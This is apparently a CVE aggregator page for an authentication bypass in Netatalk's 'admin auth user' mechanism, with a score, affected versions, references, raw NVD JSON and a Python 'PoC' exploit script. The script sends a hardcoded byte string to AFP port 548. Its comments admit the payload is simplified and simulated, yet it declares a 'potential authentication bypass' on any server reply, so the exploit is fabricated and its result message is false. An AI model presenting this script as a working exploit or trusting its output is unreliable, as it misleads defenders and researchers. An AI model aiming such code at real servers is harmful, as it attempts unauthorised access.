CVE-2026-44058

Description

An authentication bypass vulnerability in Netatalk 2.2.2 through 4.4.2 allows a remote privileged user to authenticate as an arbitrary user via the admin auth user mechanism.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Netatalk 2.2.2

Netatalk 2.2.3

Netatalk 2.2.4

Netatalk 2.2.5

Netatalk 2.2.6

Netatalk 2.2.7

Netatalk 2.2.8

Netatalk 3.0.x

Netatalk 3.1.x

Netatalk 4.0.x

Netatalk 4.1.x

Netatalk 4.2.x

Netatalk 4.3.x

Netatalk 4.4.0

Netatalk 4.4.1

Netatalk 4.4.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for CVE-2026-44058 Netatalk Authentication Bypass
# This script demonstrates the concept of exploiting the admin auth user mechanism.
# Note: This requires a valid privileged user credential to trigger the bypass.

import socket

TARGET_IP = "192.168.1.100"
TARGET_PORT = 548  # Default AFP port

def send_malicious_afp_request(target_ip, target_port):
    try:
        # Establish connection to the Netatalk server
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_ip, target_port))
        print(f"[+] Connected to {target_ip}:{target_port}")

        # AFP Header construction (Simplified)
        # In a real exploit, specific AFP command bytes (e.g., FPLogin) would be crafted.
        # The vulnerability lies in the 'admin auth user' parameter handling.
        
        # Simulating the payload that triggers the bypass
        # Payload structure: [AFP_Command][Flags][UserID_Length][UserID]
        # Exploit: Force UserID to 'root' or target user using admin context
        payload = b"\x00\x04\x00\x01\x00\x00" + b"admin" + b"\x00" + b"target_user"
        
        s.send(payload)
        print("[+] Malicious payload sent via admin auth user mechanism")
        
        # Receive response
        response = s.recv(1024)
        if response:
            print(f"[+] Server response: {response}")
            print("[+] Potential authentication bypass successful.")
        else:
            print("[-] No response received.")
            
        s.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    send_malicious_afp_request(TARGET_IP, TARGET_PORT)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44058
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44058
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44058/
[4] VulDB https://vuldb.com/cve/CVE-2026-44058
[5] https://netatalk.io/security/CVE-2026-44058

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44058", "sourceIdentifier": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "published": "2026-05-21T08:16:21.353", "lastModified": "2026-05-21T15:20:19.040", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An authentication bypass vulnerability in Netatalk 2.2.2 through 4.4.2 allows a remote privileged user to authenticate as an arbitrary user via the admin auth user mechanism."}], "metrics": {"cvssMetricV31": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "references": [{"url": "https://netatalk.io/security/CVE-2026-44058", "source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c"}]}}